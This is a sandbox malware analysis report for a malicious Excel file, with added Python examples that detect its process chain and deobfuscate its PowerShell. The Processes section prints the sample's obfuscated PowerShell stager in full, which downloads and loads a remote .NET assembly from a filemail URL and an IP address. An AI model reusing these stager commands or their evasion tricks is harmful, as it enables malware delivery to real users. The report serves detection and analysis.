Malware Analysis Report

2024-12-07 16:49

Sample ID 241113-dkbsmswarr
Target ee6666aa9e5387583b1acb4e3684dfcb10c67d2fa6738b7ba07864b79976f2ed.xls
SHA256 ee6666aa9e5387583b1acb4e3684dfcb10c67d2fa6738b7ba07864b79976f2ed
Tags
defense_evasion discovery execution
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

ee6666aa9e5387583b1acb4e3684dfcb10c67d2fa6738b7ba07864b79976f2ed

Threat Level: Known bad

The file ee6666aa9e5387583b1acb4e3684dfcb10c67d2fa6738b7ba07864b79976f2ed.xls was found to be: Known bad.

Malicious Activity Summary

defense_evasion discovery execution

Process spawned unexpected child process

Blocklisted process makes network request

Evasion via Device Credential Deployment

Command and Scripting Interpreter: PowerShell

Drops file in System32 directory

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Suspicious use of AdjustPrivilegeToken

Uses Task Scheduler COM API

Checks processor information in registry

Suspicious use of SetWindowsHookEx

Enumerates system info in registry

Suspicious behavior: AddClipboardFormatListener

Suspicious use of WriteProcessMemory

Uses Volume Shadow Copy service COM API

Modifies Internet Explorer settings

Suspicious behavior: EnumeratesProcesses

Uses Volume Shadow Copy WMI provider

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-13 03:03

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-13 03:03

Reported

2024-11-13 03:06

Platform

win7-20241023-en

Max time kernel

139s

Max time network

140s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\ee6666aa9e5387583b1acb4e3684dfcb10c67d2fa6738b7ba07864b79976f2ed.xls

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Evasion via Device Credential Deployment

defense_evasion execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\wiNdoWspoWERsHELl\V1.0\powerSHELl.eXE N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\wiNdoWspoWERsHELl\V1.0\powerSHELl.eXE N/A
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wiNdoWspoWERsHELl\V1.0\powerSHELl.eXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WScript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\wiNdoWspoWERsHELl\V1.0\powerSHELl.eXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2860 wrote to memory of 2692 (4 events) N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\wiNdoWspoWERsHELl\V1.0\powerSHELl.eXE
PID 2692 wrote to memory of 1660 (4 events) N/A C:\Windows\SysWOW64\wiNdoWspoWERsHELl\V1.0\powerSHELl.eXE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2692 wrote to memory of 1784 (4 events) N/A C:\Windows\SysWOW64\wiNdoWspoWERsHELl\V1.0\powerSHELl.eXE C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 1784 wrote to memory of 308 (4 events) N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2692 wrote to memory of 2748 (4 events) N/A C:\Windows\SysWOW64\wiNdoWspoWERsHELl\V1.0\powerSHELl.eXE C:\Windows\SysWOW64\WScript.exe
PID 2748 wrote to memory of 3064 (4 events) N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3064 wrote to memory of 2228 (4 events) N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process tree implied by the rows above (mshta.exe is started with -Embedding, i.e. COM activation, so no WriteProcessMemory row links it to EXCEL.EXE in this run):

mshta.exe (PID 2860)
  powerSHELl.eXE (PID 2692)
    powershell.exe (PID 1660)
    csc.exe (PID 1784)
      cvtres.exe (PID 308)
    WScript.exe (PID 2748)
      powershell.exe (PID 3064)
        powershell.exe (PID 2228)
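The process chain above (Office document → mshta.exe → PowerShell → csc.exe / WScript.exe → PowerShell) is what the "Process spawned unexpected child process" signature keys on. The following is an added example, not part of the sandbox report and not the sandbox's own signature logic: a small set of parent/child and command-line rules run over a constructed Sysmon-style event list that mirrors this run. PIDs come from the WriteProcessMemory rows, the EXCEL.EXE → mshta.exe link is the one the win10 run reports, Excel's PID 2140 is taken from the memory-dump names, command lines are shortened, and the rule names are this example's own.

```python
"""Process-tree detections for the chain seen in this report (added example)."""
import re

OFFICE = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe", "powershell.exe",
                "cmd.exe", "rundll32.exe", "regsvr32.exe"}
# Flags this sample uses. Matched case-insensitively because the sample
# randomises letter case (-ex BYPASs -nOP -W 1) to defeat exact-string rules.
PS_EVASION = [re.compile(p, re.I) for p in (
    r"-ex(?:ecutionpolicy)?\s+bypass", r"-nop(?:rofile)?\b",
    r"-w(?:indowstyle)?\s+(?:1|hidden)\b", r"frombase64string")]
# Canonical on-disk spellings. NTFS happily resolves
# C:\Windows\SYSteM32\wiNdoWspoWERsHELl\V1.0\powerSHELl.eXE, so odd casing in a
# system path never breaks the malware but is a cheap, telling indicator.
CANONICAL = {p.lower(): p for p in (
    r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
    r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    r"C:\Windows\SysWOW64\mshta.exe", r"C:\Windows\SysWOW64\WScript.exe")}

PS = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
NET = r"C:\Windows\Microsoft.NET\Framework\v2.0.50727"
# CONSTRUCTED event log mirroring the behavioral1 run (command lines shortened).
EVENTS = [
    dict(pid=2140, ppid=1000, image=r"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE",
         cmdline=r'"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\sample.xls'),
    dict(pid=2860, ppid=2140, image=r"C:\Windows\SysWOW64\mshta.exe",
         cmdline=r"C:\Windows\SysWOW64\mshta.exe -Embedding"),
    dict(pid=2692, ppid=2860, image=r"C:\Windows\SysWOW64\wiNdoWspoWERsHELl\V1.0\powerSHELl.eXE",
         cmdline=r'"C:\Windows\SYSteM32\wiNdoWspoWERsHELl\V1.0\powerSHELl.eXE" "poWERSheLL.ExE -ex BYPASs -nOP -W 1 -c dEViCECRedeNTIaLdePLOymenT ; IeX(...)"'),
    dict(pid=1660, ppid=2692, image=PS,
         cmdline=r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex BYPASs -nOP -W 1 -c dEViCECRedeNTIaLdePLOymenT'),
    dict(pid=1784, ppid=2692, image=NET + r"\csc.exe",
         cmdline=r'"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\clbffc8o.cmdline"'),
    dict(pid=308, ppid=1784, image=NET + r"\cvtres.exe",
         cmdline=r"C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86"),
    dict(pid=2748, ppid=2692, image=r"C:\Windows\SysWOW64\WScript.exe",
         cmdline=r'"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seethebestgirlseverdidbestthigns.vbs"'),
    dict(pid=3064, ppid=2748, image=PS,
         cmdline=r"powershell.exe -command $Codigo = 'JiAoICRQc2hPTWVbNF0r...';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"),
    dict(pid=2228, ppid=3064, image=PS,
         cmdline=r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $PshOMe[4]+$psHomE[30]+...)"'),
]

def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()

def run_rules(events):
    """Return one hit dict per (rule, process) that fires."""
    by_pid = {e["pid"]: e for e in events}

    def ancestors(e):
        while e["ppid"] in by_pid:
            e = by_pid[e["ppid"]]
            yield e

    hits = []
    def hit(rule, e):
        hits.append({"rule": rule, "pid": e["pid"], "image": e["image"]})

    for e in events:
        name = basename(e["image"])
        parent = by_pid.get(e["ppid"])
        pname = basename(parent["image"]) if parent else ""
        # Direct parent check: the sandbox's "unexpected child process" idea.
        if name in SCRIPT_HOSTS and pname in OFFICE:
            hit("office_spawns_script_host", e)
        # Any-depth check: still fires for mshta -> powershell -> wscript -> powershell.
        if name in SCRIPT_HOSTS and any(basename(a["image"]) in OFFICE for a in ancestors(e)):
            hit("office_descendant_script_host", e)
        if name == "powershell.exe" and pname in {"mshta.exe", "wscript.exe", "cscript.exe"}:
            hit("script_host_spawns_powershell", e)
        if name == "powershell.exe" and any(r.search(e["cmdline"]) for r in PS_EVASION):
            hit("powershell_evasion_flags", e)
        # csc.exe + cvtres.exe under PowerShell = on-the-fly C# compile (Add-Type style).
        if name == "csc.exe" and pname == "powershell.exe":
            hit("powershell_compiles_csharp", e)
        canon = CANONICAL.get(e["image"].lower())
        if canon and e["image"] != canon:
            hit("noncanonical_system_path", e)
    return hits

def pids_by_rule(events) -> dict:
    """Group hits as {rule: {pid, ...}} for quick review."""
    out = {}
    for h in run_rules(events):
        out.setdefault(h["rule"], set()).add(h["pid"])
    return out

if __name__ == "__main__":
    for rule, pids in pids_by_rule(EVENTS).items():
        print(f"{rule:32s} {sorted(pids)}")
```

The direct-parent rule reproduces what the sandbox flagged in the win10 run (Excel → mshta.exe); the ancestor rule is the one to deploy, because in this chain every later PowerShell is three or four hops away from the document and, with mshta.exe launched via COM `-Embedding`, the recorded parent in a real log may not even be the Office process.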

Processes

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\ee6666aa9e5387583b1acb4e3684dfcb10c67d2fa6738b7ba07864b79976f2ed.xls

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe -Embedding

C:\Windows\SysWOW64\wiNdoWspoWERsHELl\V1.0\powerSHELl.eXE

"C:\Windows\SYSteM32\wiNdoWspoWERsHELl\V1.0\powerSHELl.eXE" "poWERSheLL.ExE -ex BYPASs -nOP -W 1 -c dEViCECRedeNTIaLdePLOymenT ; IeX($(IeX('[SYsTEM.TEXT.EncodiNG]'+[CHar]58+[CHAR]0x3a+'UTF8.GetStRing([sYSTEm.coNverT]'+[chaR]0x3A+[chaR]58+'froMbase64String('+[cHAR]0x22+'[base64 payload elided]'+[cHar]34+'))')))"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex BYPASs -nOP -W 1 -c dEViCECRedeNTIaLdePLOymenT

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\clbffc8o.cmdline"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD682.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCD681.tmp"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seethebestgirlseverdidbestthigns.vbs"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRQc2hPTWVbNF0rJHBzSG9tRVszMF0rJ3gnKSggKCgnQU04aW1hZ2VVcmwgPSB5OWNuaHR0cHM6Ly8xMDE3LmZpbGVtJysnYWlsLmNvbS9hJysncGkvZicrJ2lsZS9nZXQ/ZmlsZWtleT0yQWFfYldvOVJldTQ1dDdCVTEnKydrVmdzZDlwVDlwZ1NTbHZTdEdyblRJQ2ZGaG1US2ozTEM2U1F0SWNPY18nKydUMzV3JnBrX3ZpZD1mZDRmNjE0YmIyMDljNjJjMTczMDk0NTE3NmEwOTA0ZiB5OWNuO0FNOHdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7QU04aW1hZ2VCeXRlcyA9IEFNJysnOHdlYkNsaWVudC5Eb3dubG9hZERhdGEoQU04aW1hZ2UnKydVcmwpO0FNOGltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKEFNJysnOGltYWdlQnl0ZScrJ3MpO0FNOHN0YXJ0RmxhZyA9IHk5Y248PCcrJ0JBU0U2NF9TVEFSVD4+eTljbjtBTThlbmRGbGFnJysnID0geTljbjw8QkEnKydTRTY0JysnX0VORD4+eTljbjtBTThzdGFydEluZGV4ID0gQScrJ004aW1hZ2VUZXh0LicrJ0luJysnZGV4T2YoQU04c3RhcnRGbGFnJysnKTtBJysnTThlbmRJbmRleCA9IEFNOGltYWdlVGV4dC5JbmRleE9mKEFNOGVuZEZsYWcpO0FNOHN0YXJ0SW5kZXggLWdlIDAgLWFuZCBBTThlbmRJbmRleCAtZ3QgQU04c3RhcnRJbicrJ2QnKydleDtBTThzdGFydEluZGV4ICs9IEFNOHN0YXJ0RmxhZy5MZScrJ25ndCcrJ2g7QU04YmFzZTY0TGVuZ3RoID0gQU04ZW5kSW5kZXggLSBBTThzdGFydEluZGV4JysnO0FNOGJhc2U2NENvbW1hbmQgPSBBTThpbWFnZVRleHQuU3ViJysnc3RyaScrJ25nKEFNOHN0YXJ0SW5kZXgsIEFNOGJhc2U2NExlbmd0aCk7JysnQU04JysnYmFzZTY0UmV2ZXJzZWQgPSAtam9pbiAoQU04YmFzZTY0Q29tbWFuZC4nKydUb0NoYXJBcnJheSgpIFBNVzYgRm9yRWFjaC1PYmplY3QgeyBBTThfIH0pWy0xLi4tKEFNOGJhc2UnKyc2NENvbW1hbmQuTGVuZ3RoKV07JysnQU0nKyc4Y29tbWFuJysnZEJ5dGVzID0gW1MnKyd5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhBTThiYXNlNjRSZXZlcnNlZCk7QU04bG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKEFNOGNvbW1hbmRCeXRlcyk7QU04dmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCh5OWNuVkFJeTljbik7QU04dmFpTWV0aG9kLkknKydudm9rZShBTThudWxsLCBAKHk5Y250eHQuRVJGVkdSRkUvNTMvMjkxLjg3MS42NC44OTEvLzpwdHRoeTljbiwgeTljbmRlc2F0JysnaXZhZG95OWNuLCB5OWNuZGVzYXRpdmFkb3k5Y24nKycsIHk5Y25kZXNhdGl2YWRveTljbiwgeTljbkNhc1BvbHk5YycrJ24sIHk5Y25kZXNhdGl2YWRveScrJzljbiwgeTljbmRlc2F0aXZhZG95OWNuLHk5Y25kZXNhdGl2YWRveTljJysnbix5OWNuZGVzYXRpdmFkb3k5Y24seTljbmRlc2F0aXZhZG95OWNuLHk5JysnY25kZXNhdGl2YWRveTljbix5OWNuZGVzYXQnKydpdmFkb3k5Y24seTljbjF5OWNuLHk5Y25kZXNhdGl2YWRveTljbikpOycpICAtY1JlcGxBY2UnUE1XNicsW0NoQVJdMTI0ICAtY1JlcGxBY2UoW0NoQVJdMTIxK1tDaEFSXTU3K1tDaEFSXTk5K1tDaEFSXTExMCksW0NoQVJdMzktcmVQTEFjZShbQ2hBUl02NStbQ2hBUl03NytbQ2hBUl01NiksW0NoQVJdMzYpICk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $PshOMe[4]+$psHomE[30]+'x')( (('AM8imageUrl = y9cnhttps://1017.filem'+'ail.com/a'+'pi/f'+'ile/get?filekey=2Aa_bWo9Reu45t7BU1'+'kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_'+'T35w&pk_vid=fd4f614bb209c62c1730945176a0904f y9cn;AM8webClient = New-Object System.Net.WebClient;AM8imageBytes = AM'+'8webClient.DownloadData(AM8image'+'Url);AM8imageText = [System.Text.Encoding]::UTF8.GetString(AM'+'8imageByte'+'s);AM8startFlag = y9cn<<'+'BASE64_START>>y9cn;AM8endFlag'+' = y9cn<<BA'+'SE64'+'_END>>y9cn;AM8startIndex = A'+'M8imageText.'+'In'+'dexOf(AM8startFlag'+');A'+'M8endIndex = AM8imageText.IndexOf(AM8endFlag);AM8startIndex -ge 0 -and AM8endIndex -gt AM8startIn'+'d'+'ex;AM8startIndex += AM8startFlag.Le'+'ngt'+'h;AM8base64Length = AM8endIndex - AM8startIndex'+';AM8base64Command = AM8imageText.Sub'+'stri'+'ng(AM8startIndex, AM8base64Length);'+'AM8'+'base64Reversed = -join (AM8base64Command.'+'ToCharArray() PMW6 ForEach-Object { AM8_ })[-1..-(AM8base'+'64Command.Length)];'+'AM'+'8comman'+'dBytes = [S'+'ystem.Convert]::FromBase64String(AM8base64Reversed);AM8loadedAssembly = [System.Reflection.Assembly]::Load(AM8commandBytes);AM8vaiMethod = [dnlib.IO.Home].GetMethod(y9cnVAIy9cn);AM8vaiMethod.I'+'nvoke(AM8null, @(y9cntxt.ERFVGRFE/53/291.871.64.891//:ptthy9cn, y9cndesat'+'ivadoy9cn, y9cndesativadoy9cn'+', y9cndesativadoy9cn, y9cnCasPoly9c'+'n, y9cndesativadoy'+'9cn, y9cndesativadoy9cn,y9cndesativadoy9c'+'n,y9cndesativadoy9cn,y9cndesativadoy9cn,y9'+'cndesativadoy9cn,y9cndesat'+'ivadoy9cn,y9cn1y9cn,y9cndesativadoy9cn));') -cReplAce'PMW6',[ChAR]124 -cReplAce([ChAR]121+[ChAR]57+[ChAR]99+[ChAR]110),[ChAR]39-rePLAce([ChAR]65+[ChAR]77+[ChAR]56),[ChAR]36) )"
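The last PowerShell command line is the readable form of the `$Codigo` base64 from the previous process, but it is still obfuscated: every string is spliced with `'+'`, three placeholder tokens are swapped back into real characters by the trailing `-cReplAce`/`-rePLAce` chain (PMW6 → `|`, y9cn → `'`, AM8 → `$`), the cmdlet that runs the result is spelled out of `$PSHOME` (`$PshOMe[4]+$psHomE[30]+'x'`), and the downloaded file is parsed for a `<<BASE64_START>>`/`<<BASE64_END>>` block that is reversed before decoding. The following is an added example, not part of the sandbox report and not the sample's own code: it reproduces those transformations in Python so the loader arguments can be read. The `INVOKE_FRAGMENT` is copied from the command line above; the "downloaded" content is constructed here, since the real filemail payload is not on the page.

```python
"""Deobfuscating the stage-3 PowerShell from this report (added example)."""
import base64
import re

# The sample's own chain, in order: -cReplAce 'PMW6',[ChAR]124;
# -cReplAce ([ChAR]121+[ChAR]57+[ChAR]99+[ChAR]110),[ChAR]39;
# -rePLAce ([ChAR]65+[ChAR]77+[ChAR]56),[ChAR]36.  PowerShell's -replace is
# regex-based, but none of these tokens contain metacharacters.
SUBSTITUTIONS = [("PMW6", chr(124)), ("y9cn", chr(39)), ("AM8", chr(36))]
START_FLAG, END_FLAG = "<<BASE64_START>>", "<<BASE64_END>>"

def pshome_iex(pshome: str) -> str:
    """$PshOMe[4]+$psHomE[30]+'x': two characters of the $PSHOME path spell 'iex'."""
    return pshome[4] + pshome[30] + "x"

def deobfuscate(fragment: str) -> str:
    """Undo the '+' splicing, then run the same replace chain PowerShell runs."""
    # Splicing first: tokens such as y9c'+'n or A'+'M8 only reassemble once the
    # pieces are glued back together, so substituting first would miss them.
    text = fragment.replace("'+'", "")
    for old, new in SUBSTITUTIONS:
        text = text.replace(old, new)
    return text

def string_literals(ps_code: str) -> list[str]:
    """Single-quoted literals in order (here: the loader's Invoke() arguments)."""
    return re.findall(r"'([^']*)'", ps_code)

def extract_stage_payload(downloaded_text: str) -> bytes:
    """Mirror the stager: take what sits between the flags, reverse it, base64-decode."""
    start = downloaded_text.find(START_FLAG)
    end = downloaded_text.find(END_FLAG)
    if start < 0 or end <= start:
        raise ValueError("BASE64 flags not found")
    blob = downloaded_text[start + len(START_FLAG):end]
    return base64.b64decode(blob[::-1])

def build_constructed_download(assembly: bytes) -> str:
    """CONSTRUCTED stand-in for the filemail response: reversed base64 between the flags."""
    return ("junk before\n" + START_FLAG + base64.b64encode(assembly).decode()[::-1]
            + END_FLAG + "\njunk after")

# Copied verbatim from the stage-3 command line in this report.
INVOKE_FRAGMENT = (
    "AM8vaiMethod.I'+'nvoke(AM8null, @(y9cntxt.ERFVGRFE/53/291.871.64.891//:ptthy9cn, "
    "y9cndesat'+'ivadoy9cn, y9cndesativadoy9cn'+', y9cndesativadoy9cn, y9cnCasPoly9c'+'n, "
    "y9cndesativadoy'+'9cn, y9cndesativadoy9cn,y9cndesativadoy9c'+'n,y9cndesativadoy9cn,"
    "y9cndesativadoy9cn,y9'+'cndesativadoy9cn,y9cndesat'+'ivadoy9cn,y9cn1y9cn,y9cndesativadoy9cn));"
)

def loader_url(fragment: str = INVOKE_FRAGMENT) -> str:
    """First Invoke() argument, reversed. Its reversal is an http URL whose host is
    the 198.46.178.192 contact in the Network table, which confirms the reversal."""
    return string_literals(deobfuscate(fragment))[0][::-1]

if __name__ == "__main__":
    print(pshome_iex(r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0"))  # iex
    print(deobfuscate(INVOKE_FRAGMENT))
    print(loader_url())  # http://198.46.178.192/35/EFRGVFRE.txt
    print(extract_stage_payload(build_constructed_download(b"MZ constructed bytes")))
```

Only the first argument is reversed on the page's evidence (the host it yields is the one in the Network table); the remaining literals (`desativado`, `CasPol`, `1`) are passed to the loaded assembly's `VAI` method as-is, and what they control is not something this report shows.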

Network

Country Destination Domain Proto
US 8.8.8.8:53 4t.gg udp
KR 221.146.204.133:443 4t.gg tcp
US 8.8.8.8:53 r10.o.lencr.org udp
GB 2.23.210.82:80 r10.o.lencr.org tcp
US 198.46.178.192:80 198.46.178.192 tcp
KR 221.146.204.133:443 4t.gg tcp
US 198.46.178.192:80 198.46.178.192 tcp
US 198.46.178.192:80 198.46.178.192 tcp
US 8.8.8.8:53 1017.filemail.com udp
US 142.215.209.78:443 1017.filemail.com tcp
US 142.215.209.78:443 1017.filemail.com tcp

Files

memory/2140-1-0x00000000720AD000-0x00000000720B8000-memory.dmp

memory/2140-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/2860-16-0x0000000001180000-0x0000000001182000-memory.dmp

memory/2140-17-0x0000000002310000-0x0000000002312000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CB467543952BE6B5200B9CADEB942CD1

MD5 fca2d4075e78fd8330d5590ee560451b
SHA1 b7ab976b0f45facd4a29a6aded52515523cd756b
SHA256 9f9f330b74a23eac5552db138565085b9a57c32dc746c3ad230659ad37ddc689
SHA512 f0adf4b6d64229f3c8dee585a80a7e8e1614251318be226bbf5af21779bf7ffac0d9f9858525e5388f00b9547984dae737d022d0cce4ba4c66936383bf55f991

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CB467543952BE6B5200B9CADEB942CD1

MD5 babe37ac9f6d83aff9127cedd96b4e1e
SHA1 0bc44da57a054e8b6ca393ce1e254924a0d24e04
SHA256 ba3a09f7cb2a728311696fd5eaeefd373104ff23ba6aa676b9bc6766597a30dd
SHA512 6b809dac08601466670f78b01f667e6e9223aa2d388f23098bc37462adb28f62cfc1b30c9a3664f5433960b52e8318e955e5a76f073d6593bbbccdc5383d3da9

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751

MD5 822467b728b7a66b081c91795373789a
SHA1 d8f2f02e1eef62485a9feffd59ce837511749865
SHA256 af2343382b88335eea72251ad84949e244ff54b6995063e24459a7216e9576b9
SHA512 bacea07d92c32078ca6a0161549b4e18edab745dd44947e5f181d28cc24468e07769d6835816cdfb944fd3d0099bde5e21b48f4966824c5c16c1801712303eb6

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751

MD5 a87ce9c3e4bd82acb666debd5af25f43
SHA1 85a43e29dd776014698c8203f789100a9c2f94db
SHA256 005c38f5c5e7df9efbbc89584de9a33a7e858695bc915e9ed5bcf3d75700fdf1
SHA512 f0f91c9bdfba2237e4777a5659187736f1a9b405045f9116874f6e38b366e2efc7ab48aabd12315c2cbb76a6dfa6e37266a25c85d50fc3b7a60dbd320a2e7d90

C:\Users\Admin\AppData\Local\Temp\CabCB6A.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\9GP4P3HF\seethebestthingswithgoodthingswithgreatthignsfor[1].hta

MD5 c9d3eb12917bbe42af6b4f091caf5796
SHA1 a88fc365c18e643a27984d6a7436c91c49a21717
SHA256 7bd8a55560444bfe912702828550bcb7efcfb86a70a13c5d2c2e1035ae32e9d3
